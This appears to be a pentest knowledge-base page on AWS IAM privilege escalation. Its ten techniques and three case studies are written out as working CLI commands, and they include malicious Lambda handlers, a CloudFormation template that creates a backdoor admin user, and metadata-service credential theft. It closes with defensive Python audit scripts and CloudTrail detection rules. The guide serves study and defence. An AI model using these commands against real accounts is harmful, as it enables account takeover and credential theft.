AWS IAM Privilege Escalation
Overview
AWS IAM privilege escalation is a core skill in cloud security penetration testing. By abusing IAM misconfigurations, an attacker can escalate from a low-privilege role to administrator rights.
Attack rating: ⭐⭐⭐⭐⭐
Applicable scenarios: cloud environment penetration, lateral movement
IAM Basics
Core concepts
| Term | Description |
| --- | --- |
| User | IAM user |
| Role | IAM role (can be assumed) |
| Group | User group |
| Policy | Permission policy (JSON document) |
| Principal | The entity making a request (user / role / service) |
| Action | An API operation (e.g. s3:GetObject) |
| Resource | The target resource (ARN) |
Policy structure
```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::bucket/*"
    }
  ]
}
```
Information Gathering
Enumerate current permissions
```bash
# Show the current identity
aws sts get-caller-identity
# List attached managed policies
aws iam list-attached-user-policies --user-name USERNAME
aws iam list-attached-role-policies --role-name ROLENAME
# List inline policies
aws iam list-user-policies --user-name USERNAME
aws iam get-user-policy --user-name USERNAME --policy-name POLICY
# Determine the effective permission set by probing APIs (enumerate-iam)
python3 enumerate-iam.py --access-key KEY --secret-key SECRET
```
Automated tools
```bash
# Pacu (AWS exploitation framework)
pacu
> run iam__enum_permissions
# CloudSploit
node index.js
# ScoutSuite
python3 scout.py aws --profile PROFILE
```
Common Privilege Escalation Techniques
1. iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion
Principle: create a new version of a policy that is already attached to the caller and make it the default version.
Required permissions:
```json
{
  "Effect": "Allow",
  "Action": [
    "iam:CreatePolicyVersion",
    "iam:SetDefaultPolicyVersion"
  ],
  "Resource": "arn:aws:iam::*:policy/POLICY_NAME"
}
```
Exploitation:
```bash
# 1. Create a new policy version and make it the default
aws iam create-policy-version \
  --policy-arn arn:aws:iam::ACCOUNT_ID:policy/POLICY \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }]
  }' \
  --set-as-default
# 2. Verify access
aws sts get-caller-identity
```
2. iam:AttachUserPolicy / iam:AttachRolePolicy
Principle: attach an administrator policy directly.
Required permissions:
```json
{
  "Effect": "Allow",
  "Action": [
    "iam:AttachUserPolicy",
    "iam:AttachRolePolicy"
  ],
  "Resource": "*"
}
```
Exploitation:
```bash
# Attach the administrator policy to a user
aws iam attach-user-policy \
  --user-name TARGET_USER \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# Or attach it to a role
aws iam attach-role-policy \
  --role-name TARGET_ROLE \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
```
3. iam:CreateAccessKey
Principle: create access keys for another user.
Required permissions:
```json
{
  "Effect": "Allow",
  "Action": "iam:CreateAccessKey",
  "Resource": "arn:aws:iam::*:user/*"
}
```
Exploitation:
```bash
# Create a key pair for the administrator user
aws iam create-access-key --user-name admin
# Output
{
  "AccessKey": {
    "AccessKeyId": "AKIA...",
    "SecretAccessKey": "SECRET"
  }
}
# Use the new key pair
aws configure --profile admin
```
4. iam:UpdateAssumeRolePolicy + sts:AssumeRole
Principle: modify a role's trust policy so that the caller is allowed to assume it.
Required permissions:
```json
{
  "Effect": "Allow",
  "Action": [
    "iam:UpdateAssumeRolePolicy",
    "sts:AssumeRole"
  ],
  "Resource": "arn:aws:iam::*:role/TARGET_ROLE"
}
```
Exploitation:
```bash
# 1. Modify the trust policy
aws iam update-assume-role-policy \
  --role-name TARGET_ROLE \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::ACCOUNT_ID:user/ATTACKER"},
      "Action": "sts:AssumeRole"
    }]
  }'
# 2. Assume the role
aws sts assume-role \
  --role-arn arn:aws:iam::ACCOUNT_ID:role/TARGET_ROLE \
  --role-session-name attack
# 3. Use the temporary credentials
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
```
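The trust policy is the control that technique 4 (and technique 10 below) abuses, so it is the thing a defender should audit. The following Python is an added example, not part of the original page: it walks a role's AssumeRolePolicyDocument (parsed JSON, as returned by `aws iam get-role`) and flags anonymous `*` principals, whole-account `:root` trust, and cross-account principals that carry no `sts:ExternalId` condition. The account IDs and the sample trust policy are constructed.

```python
OWN_ACCOUNT = "123456789012"  # constructed sample: the account being audited

def _as_list(v):
    return v if isinstance(v, list) else [v]

def _principals(stmt):
    """Yield (kind, value) pairs from a statement's Principal element."""
    p = stmt.get("Principal", {})
    if p == "*":  # anonymous principal
        p = {"*": "*"}
    for kind, vals in p.items():
        for v in _as_list(vals):
            yield kind, v

def _has_external_id(stmt):
    """True if any Condition block constrains sts:ExternalId."""
    cond = stmt.get("Condition") or {}
    return any("sts:externalid" in (k.lower() for k in keys) for keys in cond.values())

def trust_findings(role_name, trust_policy, own_account=OWN_ACCOUNT):
    """Findings for one role's AssumeRolePolicyDocument (already-parsed JSON)."""
    findings = []
    for stmt in _as_list(trust_policy.get("Statement", [])):
        actions = {a.lower() for a in _as_list(stmt.get("Action", []))}
        if stmt.get("Effect") != "Allow" or not actions & {"sts:assumerole", "sts:*", "*"}:
            continue
        for kind, val in _principals(stmt):
            if val == "*":
                findings.append(f"{role_name}: anonymous principal '*'")
            elif kind == "AWS":
                # Principal is either arn:aws:iam::ACCOUNT:user/NAME or a bare account ID
                acct = val.split(":")[4] if val.startswith("arn:") else val
                if acct != own_account and not _has_external_id(stmt):
                    findings.append(f"{role_name}: cross-account principal {val} without sts:ExternalId")
                elif val.endswith(":root") or acct == val:
                    findings.append(f"{role_name}: trusts the entire account {acct}")
    return findings

# Constructed sample: a Lambda execution role whose trust policy was edited as in technique 4
SAMPLE_TRUST = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": {"Service": "lambda.amazonaws.com"}, "Action": "sts:AssumeRole"},
    {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::999999999999:user/ATTACKER"},
     "Action": "sts:AssumeRole"},
]}

if __name__ == "__main__":
    for finding in trust_findings("lambda-exec-role", SAMPLE_TRUST):
        print(finding)
```

Run it over every role returned by `aws iam list-roles` to catch a trust policy that was rewritten after the fact.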
5. iam:CreateLoginProfile
Principle: create a console login password for a user.
Required permissions:
```json
{
  "Effect": "Allow",
  "Action": "iam:CreateLoginProfile",
  "Resource": "arn:aws:iam::*:user/*"
}
```
Exploitation:
```bash
# Create a console password
aws iam create-login-profile \
  --user-name admin \
  --password 'P@ssw0rd123!' \
  --password-reset-required
# Log in to the console
# https://ACCOUNT_ID.signin.aws.amazon.com/console
```
6. lambda:UpdateFunctionCode + lambda:InvokeFunction
Principle: replace a Lambda function's code so that it runs under the function's execution role.
Required permissions:
```json
{
  "Effect": "Allow",
  "Action": [
    "lambda:UpdateFunctionCode",
    "lambda:InvokeFunction"
  ],
  "Resource": "*"
}
```
Exploitation:
```bash
# 1. Write the malicious handler
cat > exploit.py << 'EOF'
import boto3

def lambda_handler(event, context):
    # Runs with the credentials of the function's execution role
    iam = boto3.client('iam')
    iam.attach_role_policy(
        RoleName='TARGET_ROLE',
        PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
    )
    return {'status': 'done'}
EOF
# 2. Package it
zip exploit.zip exploit.py
# 3. Update the function code
aws lambda update-function-code \
  --function-name TARGET_FUNCTION \
  --zip-file fileb://exploit.zip
# 4. Invoke it
aws lambda invoke \
  --function-name TARGET_FUNCTION \
  output.json
```
7. ec2:RunInstances + iam:PassRole
Principle: launch an EC2 instance with a highly privileged instance profile attached.
Required permissions:
```json
{
  "Effect": "Allow",
  "Action": [
    "ec2:RunInstances",
    "iam:PassRole"
  ],
  "Resource": "*"
}
```
Exploitation:
```bash
# 1. Launch an EC2 instance with the administrator instance profile
aws ec2 run-instances \
  --image-id ami-12345678 \
  --instance-type t2.micro \
  --iam-instance-profile Name=ADMIN_PROFILE
# 2. Log in over SSH
ssh -i key.pem ec2-user@INSTANCE_IP
# 3. Fetch the instance credentials from the metadata service
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ADMIN_PROFILE
```
8. glue:UpdateDevEndpoint / glue:CreateDevEndpoint
Principle: modify an AWS Glue development endpoint to inject an SSH public key.
Required permissions:
```json
{
  "Effect": "Allow",
  "Action": [
    "glue:UpdateDevEndpoint",
    "glue:CreateDevEndpoint"
  ],
  "Resource": "*"
}
```
Exploitation:
```bash
# 1. Generate an SSH key pair
ssh-keygen -t rsa
# 2. Update the endpoint with the public key
aws glue update-dev-endpoint \
  --endpoint-name TARGET_ENDPOINT \
  --public-key "$(cat ~/.ssh/id_rsa.pub)"
# 3. Connect over SSH
ssh -i ~/.ssh/id_rsa glueservice@ENDPOINT_IP
```
9. cloudformation:CreateStack
Principle: create a CloudFormation stack whose resources are provisioned with the stack's permissions.
Required permissions:
```json
{
  "Effect": "Allow",
  "Action": "cloudformation:CreateStack",
  "Resource": "*"
}
```
Exploitation:
```bash
# 1. Write the malicious template
cat > exploit.yaml << 'EOF'
AWSTemplateFormatVersion: '2010-09-09'
Resources:
  BackdoorUser:
    Type: AWS::IAM::User
    Properties:
      UserName: backdoor
  BackdoorPolicy:
    Type: AWS::IAM::Policy
    Properties:
      PolicyName: AdminAccess
      PolicyDocument:
        Version: '2012-10-17'
        Statement:
          - Effect: Allow
            Action: '*'
            Resource: '*'
      Users:
        - !Ref BackdoorUser
EOF
# 2. Create the stack
aws cloudformation create-stack \
  --stack-name exploit \
  --template-body file://exploit.yaml \
  --capabilities CAPABILITY_NAMED_IAM
# 3. Use the backdoor user
aws configure --profile backdoor
```
10. sts:AssumeRole + an over-permissioned role
Principle: assume a role that has excessive permissions.
Discovery:
```bash
# List roles together with their trust policies
aws iam list-roles --query 'Roles[?AssumeRolePolicyDocument]'
# Inspect a role's inline policy
aws iam get-role-policy --role-name ROLE_NAME --policy-name POLICY
```
Exploitation:
```bash
# Assume the role
aws sts assume-role \
  --role-arn arn:aws:iam::ACCOUNT_ID:role/OVERPERMISSIONED_ROLE \
  --role-session-name attack
# Use the temporary credentials
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
```
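Each of the techniques above is enabled by a specific set of actions in a policy, which makes the policy document itself auditable. The following Python is an added example, not part of the original page or of any of the tools it lists: it checks a parsed IAM policy document against the action sets of techniques 1 to 9 (technique 10 depends on the role's trust policy rather than on the caller's own permissions) and expands wildcards such as `*`, `iam:*` or `iam:Create*` the way IAM does. The sample policy and account ID are constructed.

```python
import fnmatch

# Action sets from techniques 1 to 9 above. A policy that grants every action in a
# set, directly or through a wildcard, is a candidate for review.
PRIVESC_PATHS = {
    "1 CreatePolicyVersion": {"iam:CreatePolicyVersion"},
    "2 AttachUserPolicy": {"iam:AttachUserPolicy"},
    "2 AttachRolePolicy": {"iam:AttachRolePolicy"},
    "3 CreateAccessKey": {"iam:CreateAccessKey"},
    "4 UpdateAssumeRolePolicy": {"iam:UpdateAssumeRolePolicy", "sts:AssumeRole"},
    "5 CreateLoginProfile": {"iam:CreateLoginProfile"},
    "6 LambdaUpdateFunctionCode": {"lambda:UpdateFunctionCode", "lambda:InvokeFunction"},
    "7 EC2RunInstancesPassRole": {"ec2:RunInstances", "iam:PassRole"},
    "8 GlueUpdateDevEndpoint": {"glue:UpdateDevEndpoint"},
    "9 CloudFormationCreateStack": {"cloudformation:CreateStack"},
}

def _as_list(v):
    return v if isinstance(v, list) else [v]

def allowed_patterns(policy):
    """Lower-cased action patterns granted by Allow statements. Deny, Resource and
    Condition are ignored on purpose: they can narrow a path, so the result is a
    review list, not a proof of exploitability."""
    pats = set()
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") == "Allow" and "Action" in stmt:
            pats.update(a.lower() for a in _as_list(stmt["Action"]))
    return pats

def grants(patterns, action):
    """True if any pattern ('*', 'iam:*', 'iam:Create*') matches the action."""
    return any(fnmatch.fnmatchcase(action.lower(), p) for p in patterns)

def privesc_paths(policy):
    """Names of the techniques a policy document fully enables."""
    pats = allowed_patterns(policy)
    return sorted(name for name, needed in PRIVESC_PATHS.items()
                  if all(grants(pats, a) for a in needed))

# Constructed sample: a developer policy that also allows new versions of itself
SAMPLE_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["s3:GetObject", "s3:PutObject"],
     "Resource": "arn:aws:s3:::specific-bucket/*"},
    {"Effect": "Allow", "Action": "iam:CreatePolicyVersion",
     "Resource": "arn:aws:iam::123456789012:policy/DeveloperPolicy"},
]}

if __name__ == "__main__":
    print(privesc_paths(SAMPLE_POLICY))  # ['1 CreatePolicyVersion']
```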
Case Studies
Case 1: developer to administrator
```bash
# 1. Initial access (leaked access keys)
aws configure --profile dev
aws sts get-caller-identity
# 2. Enumerate permissions
pacu
> set_keys DEV_KEY DEV_SECRET
> run iam__enum_permissions
# 3. Found iam:CreatePolicyVersion,
#    but scoped to one specific policy
# 4. Create a new version of that policy
aws iam create-policy-version \
  --policy-arn arn:aws:iam::ACCOUNT_ID:policy/DeveloperPolicy \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }]
  }' \
  --set-as-default
# 5. Verify the escalation
aws iam list-users  # success!
```
Case 2: EC2 instance role escalation
```bash
# 1. Fetch the instance credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/INSTANCE_ROLE
# 2. Configure the credentials
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
# 3. Enumerate permissions
python3 enumerate-iam.py --access-key "$AWS_ACCESS_KEY_ID" \
  --secret-key "$AWS_SECRET_ACCESS_KEY" --session-token "$AWS_SESSION_TOKEN"
# 4. Found iam:PassRole + ec2:RunInstances
# 5. Launch a new EC2 instance with the administrator instance profile
aws ec2 run-instances \
  --image-id ami-12345678 \
  --instance-type t2.micro \
  --iam-instance-profile Name=AdminProfile
# 6. SSH into the new instance
#    and obtain administrator credentials from its metadata service
```
Case 3: Lambda escalation
```bash
# 1. List Lambda functions
aws lambda list-functions
# 2. Inspect the function's resource policy
aws lambda get-policy --function-name TARGET
# 3. Found lambda:UpdateFunctionCode
# 4. Write the malicious handler
cat > exploit.py << 'EOF'
import boto3

def lambda_handler(event, context):
    iam = boto3.client('iam')
    iam.attach_user_policy(
        UserName='CURRENT_USER',
        PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
    )
    return {'status': 'done'}
EOF
# 5. Update and invoke
zip exploit.zip exploit.py
aws lambda update-function-code --function-name TARGET --zip-file fileb://exploit.zip
aws lambda invoke --function-name TARGET output.json
# 6. Verify the permissions
aws iam list-users  # success!
```
Tools
Pacu
```bash
# Install
git clone https://github.com/RhinoSecurityLabs/pacu
cd pacu
pip install -r requirements.txt
# Use
python3 pacu.py
> set_keys ACCESS_KEY SECRET_KEY
> run iam__enum_permissions
> run iam__privesc_scan
> run ec2__enum
```
CloudSploit
```bash
# Install
git clone https://github.com/aquasecurity/cloudsploit
cd cloudsploit
npm install
# Scan
node index.js --profile PROFILE
```
ScoutSuite
```bash
# Install
pip install scoutsuite
# Scan (the pip package installs the `scout` entry point)
scout aws --profile PROFILE
scout aws --access-keys ACCESS_KEY SECRET_KEY
```
enumerate-iam
```bash
# Install
git clone https://github.com/andresriancho/enumerate-iam
cd enumerate-iam
pip install -r requirements.txt
# Enumerate
python3 enumerate-iam.py --access-key KEY --secret-key SECRET
```
Defensive Recommendations
Least privilege
❌ Over-permissive:
```json
{
  "Effect": "Allow",
  "Action": "*",
  "Resource": "*"
}
```
✅ Least privilege:
```json
{
  "Effect": "Allow",
  "Action": [
    "s3:GetObject",
    "s3:PutObject"
  ],
  "Resource": "arn:aws:s3:::specific-bucket/*"
}
```
Permissions boundaries
```bash
# Set a permissions boundary on a user
aws iam put-user-permissions-boundary \
  --user-name USERNAME \
  --permissions-boundary arn:aws:iam::ACCOUNT_ID:policy/PermissionsBoundary
```
Monitoring and detection
CloudTrail alerts: monitor the following events:
- iam:CreatePolicyVersion
- iam:SetDefaultPolicyVersion
- iam:AttachUserPolicy
- iam:AttachRolePolicy
- iam:CreateAccessKey
- sts:AssumeRole
AWS Config rules: check for IAM policy changes.
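The event list above becomes useful once it is turned into rules that look at the request parameters, not just the event name. The following Python is an added example, not part of the original page: it classifies CloudTrail records (which carry `eventSource`/`eventName` rather than the `iam:Action` form used above) for the listed events plus `UpdateAssumeRolePolicy` and `CreateLoginProfile` from the technique list, and adds context such as a policy version being set as default, AdministratorAccess being attached, or a key created for a different user than the caller. The sample records are constructed and abbreviated.

```python
HIGH = {"CreatePolicyVersion", "SetDefaultPolicyVersion", "AttachUserPolicy",
        "AttachRolePolicy", "CreateAccessKey", "CreateLoginProfile", "UpdateAssumeRolePolicy"}
WATCHED = {("iam.amazonaws.com", name): "high" for name in HIGH}
WATCHED[("sts.amazonaws.com", "AssumeRole")] = "info"

def classify(event):
    """Return (severity, reason) for one CloudTrail record, or None if not watched."""
    key = (event.get("eventSource"), event.get("eventName"))
    if key not in WATCHED:
        return None
    params = event.get("requestParameters") or {}
    actor = (event.get("userIdentity") or {}).get("userName")
    reasons = [key[1]]
    # Attaching the AWS-managed AdministratorAccess policy (techniques 2 and 6)
    if (params.get("policyArn") or "").endswith("/AdministratorAccess"):
        reasons.append("attaches AdministratorAccess")
    # A new version made default is how a policy is swapped for '*' (technique 1)
    if key[1] == "CreatePolicyVersion" and params.get("setAsDefault"):
        reasons.append("new version set as default")
    # Keys or console passwords created for someone other than the caller (techniques 3 and 5)
    if key[1] in ("CreateAccessKey", "CreateLoginProfile") and params.get("userName") not in (None, actor):
        reasons.append(f"targets another user ({params['userName']})")
    # Denied calls are the enumeration noise that usually precedes a successful step
    if event.get("errorCode"):
        reasons.append(f"failed: {event['errorCode']}")
    return WATCHED[key], "; ".join(reasons)

def scan(records):
    """Scan a list of CloudTrail records; return [(eventID, severity, reason)] for hits."""
    hits = []
    for ev in records:
        hit = classify(ev)
        if hit:
            hits.append((ev.get("eventID"), hit[0], hit[1]))
    return hits

# Constructed sample records (abbreviated; real records carry many more fields)
SAMPLE_EVENTS = [
    {"eventID": "ev-1", "eventSource": "iam.amazonaws.com", "eventName": "AttachUserPolicy",
     "userIdentity": {"userName": "dev"}, "requestParameters": {"userName": "dev",
     "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
    {"eventID": "ev-2", "eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": {"userName": "dev"}, "requestParameters": {"userName": "admin"}},
    {"eventID": "ev-3", "eventSource": "sts.amazonaws.com", "eventName": "GetCallerIdentity",
     "userIdentity": {"userName": "dev"}},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(*hit)
```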